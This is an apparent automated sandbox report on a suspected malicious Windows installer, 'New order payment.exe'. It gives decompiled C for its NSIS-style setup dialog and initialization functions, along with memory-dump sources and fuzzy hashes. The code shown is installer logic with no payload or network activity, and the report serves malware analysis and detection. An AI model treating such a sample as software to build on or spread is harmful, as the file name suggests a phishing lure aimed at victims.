                                                                0x00406720
                                                                0x00406720
                                                                0x00406720
                                                                0x00000000
                                                                0x00406798
                                                                0x00000000
                                                                0x00406798
                                                                0x00406796
                                                                0x004066a9
                                                                0x004066ac
                                                                0x004066ae
                                                                0x004066b1
                                                                0x004066b4
                                                                0x004066b7
                                                                0x004066b9
                                                                0x004066bc
                                                                0x004066bf
                                                                0x004066bf
                                                                0x004066c2
                                                                0x004066c2
                                                                0x004066c5
                                                                0x004066cc
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x004066a0
                                                                0x00000000
                                                                0x004066ce
                                                                0x00000000
                                                                0x004066ce
                                                                0x004066cc
                                                                0x00406652
                                                                0x00406655
                                                                0x00406657
                                                                0x0040665a
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406544
                                                                0x00406544
                                                                0x00406548
                                                                0x00406a0e
                                                                0x00000000
                                                                0x00406a0e
                                                                0x0040654e
                                                                0x00406551
                                                                0x00406554
                                                                0x00406557
                                                                0x00406559
                                                                0x00406559
                                                                0x00406559
                                                                0x0040655c
                                                                0x0040655f
                                                                0x00406562
                                                                0x00406565
                                                                0x00406568
                                                                0x0040656b
                                                                0x0040656c
                                                                0x0040656e
                                                                0x0040656e
                                                                0x0040656e
                                                                0x00406571
                                                                0x00406574
                                                                0x00406577
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657d
                                                                0x00000000
                                                                0x00000000
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c1
                                                                0x004067c5
                                                                0x00000000
                                                                0x00000000
                                                                0x004067cb
                                                                0x004067ce
                                                                0x004067d1
                                                                0x004067d4
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d6
                                                                0x004067d9
                                                                0x004067dc
                                                                0x004067df
                                                                0x004067e2
                                                                0x004067e5
                                                                0x004067e8
                                                                0x004067e9
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067eb
                                                                0x004067ee
                                                                0x004067f1
                                                                0x004067f4
                                                                0x004067f7
                                                                0x004067fa
                                                                0x004067fe
                                                                0x00406800
                                                                0x00406803
                                                                0x00000000
                                                                0x00406805
                                                                0x00000000
                                                                0x00406805
                                                                0x00406803
                                                                0x00406a38
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                                • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                                                • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                                • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00405E93, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00405E93(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422588); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422588;
			}




                                                                0x00405e9e
                                                                0x00405ea7
                                                                0x00000000
                                                                0x00405eb4
                                                                0x00405eaa
                                                                0x00000000

                                                                APIs
                                                                • FindFirstFileA.KERNEL32(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                                                • FindClose.KERNEL32(00000000), ref: 00405EAA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID:
                                                                • API String ID: 2295610775-0
                                                                • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                                • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                                                • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                                • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00403981, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 84%
                                                                			E00403981(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42051c = _t35;
					if(_t115 == 0x110) {
						 *0x423f48 = _t125;
						 *0x420530 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f4f8 = _t91;
						E00403E54(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423728); // executed
						 *0x42370c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42051c = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f60;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403EA0(0x40b);
						while(1) {
							_t37 =  *0x42051c;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x423f64; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42370c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423f64; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E54(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fcc - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E76(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fcc - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420530);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f8);
							}
							E00403E89();
							E00405B98(0x420538, "ebykawqyaa Setup");
							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420538);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423718);
									 *0x41fd08 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423718 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E54(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42370c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423718, 8);
									E00403EA0(0x405);
									goto L58;
								}
								__eflags =  *0x423fcc - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423fc0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423718);
						 *0x423f48 = _t133;
						EndDialog(_t125,  *0x41f900);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423718, 0x40f, 0, 1);
						__eflags =  *0x42370c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EBB(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423718, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fcc - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f900 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E2D();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f900 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423718);
						 *0x423718 = _a12;
						L58:
						if( *0x421538 == _t133) {
							_t142 =  *0x423718 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421538 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                                0x0040398a
                                                                0x00403993
                                                                0x00403ad4
                                                                0x00403ad8
                                                                0x00403adc
                                                                0x00403ade
                                                                0x00403ae3
                                                                0x00403aee
                                                                0x00403af9
                                                                0x00403afe
                                                                0x00403b00
                                                                0x00403b02
                                                                0x00403b05
                                                                0x00403b0a
                                                                0x00403b18
                                                                0x00403b25
                                                                0x00403b2c
                                                                0x00403b2c
                                                                0x00403b2d
                                                                0x00403b2d
                                                                0x00403b32
                                                                0x00403b38
                                                                0x00403b3f
                                                                0x00403b45
                                                                0x00403b47
                                                                0x00403b87
                                                                0x00403b8c
                                                                0x00403b91
                                                                0x00403b91
                                                                0x00403b96
                                                                0x00403b9f
                                                                0x00403ba1
                                                                0x00403ba6
                                                                0x00403bac
                                                                0x00403bb0
                                                                0x00403bb0
                                                                0x00403bb5
                                                                0x00403bbb
                                                                0x00000000
                                                                0x00000000
                                                                0x00403bc1
                                                                0x00403bc6
                                                                0x00403bcc
                                                                0x00000000
                                                                0x00000000
                                                                0x00403bd5
                                                                0x00403bdd
                                                                0x00403be2
                                                                0x00403be5
                                                                0x00403beb
                                                                0x00403bf0
                                                                0x00403bf3
                                                                0x00403bf9
                                                                0x00403bfe
                                                                0x00403c01
                                                                0x00403c07
                                                                0x00403c0f
                                                                0x00403c15
                                                                0x00403c1b
                                                                0x00403c1f
                                                                0x00403c26
                                                                0x00403c26
                                                                0x00403c26
                                                                0x00403c30
                                                                0x00403c42
                                                                0x00403c4e
                                                                0x00403c53
                                                                0x00403c5d
                                                                0x00403c63
                                                                0x00403c65
                                                                0x00403c6a
                                                                0x00403c67
                                                                0x00403c67
                                                                0x00403c67
                                                                0x00403c7a
                                                                0x00403c92
                                                                0x00403c94
                                                                0x00403c9a
                                                                0x00403caf
                                                                0x00403c9c
                                                                0x00403ca5
                                                                0x00403ca7
                                                                0x00403ca7
                                                                0x00403cb5
                                                                0x00403cc5
                                                                0x00403cd6
                                                                0x00403cdd
                                                                0x00403ce3
                                                                0x00403ce7
                                                                0x00403cec
                                                                0x00403cee
                                                                0x00000000
                                                                0x00403cf4
                                                                0x00403cf4
                                                                0x00403cf6
                                                                0x00000000
                                                                0x00000000
                                                                0x00403cfc
                                                                0x00403d00
                                                                0x00403d25
                                                                0x00403d2b
                                                                0x00403d31
                                                                0x00403d33
                                                                0x00000000
                                                                0x00000000
                                                                0x00403d59
                                                                0x00403d5f
                                                                0x00403d61
                                                                0x00403d66
                                                                0x00000000
                                                                0x00000000
                                                                0x00403d6c
                                                                0x00403d6f
                                                                0x00403d72
                                                                0x00403d89
                                                                0x00403d95
                                                                0x00403dae
                                                                0x00403db4
                                                                0x00403db8
                                                                0x00403dbd
                                                                0x00403dc3
                                                                0x00000000
                                                                0x00000000
                                                                0x00403dcd
                                                                0x00403dd8
                                                                0x00000000
                                                                0x00403dd8
                                                                0x00403d02
                                                                0x00403d08
                                                                0x00000000
                                                                0x00000000
                                                                0x00403d0e
                                                                0x00403d14
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403d1a
                                                                0x00403cee
                                                                0x00403de5
                                                                0x00403df1
                                                                0x00403df8
                                                                0x00000000
                                                                0x00403b49
                                                                0x00403b49
                                                                0x00403b4c
                                                                0x00403b7f
                                                                0x00403b7f
                                                                0x00403b81
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403b81
                                                                0x00403b4e
                                                                0x00403b52
                                                                0x00403b57
                                                                0x00403b59
                                                                0x00000000
                                                                0x00000000
                                                                0x00403b69
                                                                0x00403b71
                                                                0x00000000
                                                                0x00403b77
                                                                0x004039a5
                                                                0x004039a5
                                                                0x004039a9
                                                                0x004039ae
                                                                0x004039bd
                                                                0x004039bd
                                                                0x004039c6
                                                                0x004039cf
                                                                0x004039da
                                                                0x004039da
                                                                0x004039e6
                                                                0x00403a02
                                                                0x00403a05
                                                                0x00403a18
                                                                0x00403a1e
                                                                0x00403ac1
                                                                0x00000000
                                                                0x00403aca
                                                                0x00403a24
                                                                0x00403a31
                                                                0x00403a33
                                                                0x00403a35
                                                                0x00403a54
                                                                0x00403a54
                                                                0x00403a57
                                                                0x00403a5c
                                                                0x00403a5f
                                                                0x00403a6f
                                                                0x00403a70
                                                                0x00403a72
                                                                0x00403aa8
                                                                0x00403abb
                                                                0x00000000
                                                                0x00403abb
                                                                0x00403a74
                                                                0x00403a7a
                                                                0x00403a93
                                                                0x00403a98
                                                                0x00403a9a
                                                                0x00000000
                                                                0x00000000
                                                                0x00403a9c
                                                                0x00403a88
                                                                0x00403a88
                                                                0x00403a8a
                                                                0x00403a8a
                                                                0x00000000
                                                                0x00403a8a
                                                                0x00403a7d
                                                                0x00403a82
                                                                0x00000000
                                                                0x00403a82
                                                                0x00403a61
                                                                0x00403a67
                                                                0x00000000
                                                                0x00000000
                                                                0x00403a69
                                                                0x00000000
                                                                0x00403a69
                                                                0x00403a59
                                                                0x00000000
                                                                0x00403a59
                                                                0x00403a3f
                                                                0x00403a46
                                                                0x00403a4c
                                                                0x00403a4e
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403a4e
                                                                0x00403a0a
                                                                0x00000000
                                                                0x004039e8
                                                                0x004039ee
                                                                0x004039f8
                                                                0x00403dfe
                                                                0x00403e04
                                                                0x00403e06
                                                                0x00403e0c
                                                                0x00403e11
                                                                0x00403e17
                                                                0x00403e17
                                                                0x00403e0c
                                                                0x00403e21
                                                                0x00000000
                                                                0x00403e21
                                                                0x004039e6

                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                                                • ShowWindow.USER32(?), ref: 004039DA
                                                                • DestroyWindow.USER32 ref: 004039EE
                                                                • SetWindowLongA.USER32 ref: 00403A0A
                                                                • GetDlgItem.USER32 ref: 00403A2B
                                                                • SendMessageA.USER32 ref: 00403A3F
                                                                • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                                                • GetDlgItem.USER32 ref: 00403AF4
                                                                • GetDlgItem.USER32 ref: 00403AFE
                                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B18
                                                                • SendMessageA.USER32 ref: 00403B69
                                                                • GetDlgItem.USER32 ref: 00403C0F
                                                                • ShowWindow.USER32(00000000,?), ref: 00403C30
                                                                • EnableWindow.USER32(?,?), ref: 00403C42
                                                                • EnableWindow.USER32(?,?), ref: 00403C5D
                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C73
                                                                • EnableMenuItem.USER32 ref: 00403C7A
                                                                • SendMessageA.USER32 ref: 00403C92
                                                                • SendMessageA.USER32 ref: 00403CA5
                                                                • lstrlenA.KERNEL32(00420538,?,00420538,ebykawqyaa Setup), ref: 00403CCE
                                                                • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                                                • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                • String ID: ebykawqyaa Setup
                                                                • API String ID: 4050669955-3719255578
                                                                • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                                • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                                                • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                                                • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004035EB, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 96%
                                                                			E004035EB(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f50; // 0x771a18
				_t20 = E00405F28(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420538;
					"1033" = 0x7830;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
					__eflags =  *0x420538;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AF6("1033",  *_t20() & 0x0000ffff);
				}
				E004038B4(_t76, _t88);
				_t24 =  *0x423f58; // 0x80
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x423fc0 = _t24 & 0x00000020;
				 *0x423fdc = 0x10000;
				if(E0040576C(_t88, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040576C(_t96, _t84) == 0) {
						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423728 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038B4(_t76, __eflags);
							__eflags =  *0x423fe0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F56(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42370c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420510, 5); // executed
							_t37 = E00405EBA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EBA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236e0);
								 *0x423704 = _t85;
								RegisterClassA(0x4236e0);
							}
							_t39 =  *0x423720; // 0x0
							_t42 = DialogBoxParamA( *0x423f40, _t39 + 0x00000069 & 0x0000ffff, 0, E00403981, 0); // executed
							E0040353B(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f40; // 0x400000
						 *0x4236f4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236e4 = E00401000;
						 *0x4236f0 = _t76;
						 *0x423704 =  &_v20;
						if(RegisterClassA(0x4236e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423f78; // 0x776990
					_t79 = 0x422ee0;
					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422ee0, 0);
					_t62 =  *0x422ee0; // 0x73
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422ee1;
						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B98(_t84, E0040568B(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056D2(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                                0x004035f1
                                                                0x004035fa
                                                                0x00403601
                                                                0x00403603
                                                                0x00403617
                                                                0x00403629
                                                                0x00403633
                                                                0x00403638
                                                                0x0040363e
                                                                0x00403651
                                                                0x00403651
                                                                0x0040365c
                                                                0x00403605
                                                                0x00403610
                                                                0x00403610
                                                                0x00403661
                                                                0x00403666
                                                                0x0040366b
                                                                0x00403674
                                                                0x00403679
                                                                0x0040368a
                                                                0x00403711
                                                                0x00403719
                                                                0x00403722
                                                                0x00403722
                                                                0x00403738
                                                                0x0040373e
                                                                0x0040374c
                                                                0x004037db
                                                                0x004037e3
                                                                0x004037ed
                                                                0x004037f2
                                                                0x004037f8
                                                                0x00403882
                                                                0x00403887
                                                                0x00403889
                                                                0x004038a5
                                                                0x00000000
                                                                0x004038a5
                                                                0x0040388b
                                                                0x00403891
                                                                0x00403899
                                                                0x00403899
                                                                0x00000000
                                                                0x00403891
                                                                0x00403806
                                                                0x00403811
                                                                0x00403816
                                                                0x00403818
                                                                0x0040381f
                                                                0x0040381f
                                                                0x0040382a
                                                                0x00403832
                                                                0x00403834
                                                                0x00403836
                                                                0x0040383f
                                                                0x00403842
                                                                0x00403848
                                                                0x00403848
                                                                0x0040384e
                                                                0x00403867
                                                                0x00403878
                                                                0x00000000
                                                                0x0040387d
                                                                0x004037e5
                                                                0x004037e7
                                                                0x00000000
                                                                0x00403752
                                                                0x00403752
                                                                0x00403758
                                                                0x00403762
                                                                0x0040376a
                                                                0x00403774
                                                                0x0040377a
                                                                0x00403788
                                                                0x004038aa
                                                                0x004038aa
                                                                0x00000000
                                                                0x004038aa
                                                                0x0040378e
                                                                0x00403797
                                                                0x004037d6
                                                                0x00000000
                                                                0x004037d6
                                                                0x00403690
                                                                0x00403690
                                                                0x00403695
                                                                0x00000000
                                                                0x00000000
                                                                0x0040369a
                                                                0x0040369f
                                                                0x004036af
                                                                0x004036b4
                                                                0x004036bb
                                                                0x00000000
                                                                0x00000000
                                                                0x004036bf
                                                                0x004036c1
                                                                0x004036ce
                                                                0x004036ce
                                                                0x004036d6
                                                                0x004036dc
                                                                0x00403704
                                                                0x0040370c
                                                                0x00000000
                                                                0x004036ee
                                                                0x004036ef
                                                                0x004036f8
                                                                0x004036fe
                                                                0x004036ff
                                                                0x00000000
                                                                0x004036ff
                                                                0x004036fa
                                                                0x004036fc
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004036fc
                                                                0x004036dc

                                                                APIs
                                                                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\New order payment.exe" ,00000000), ref: 0040365C
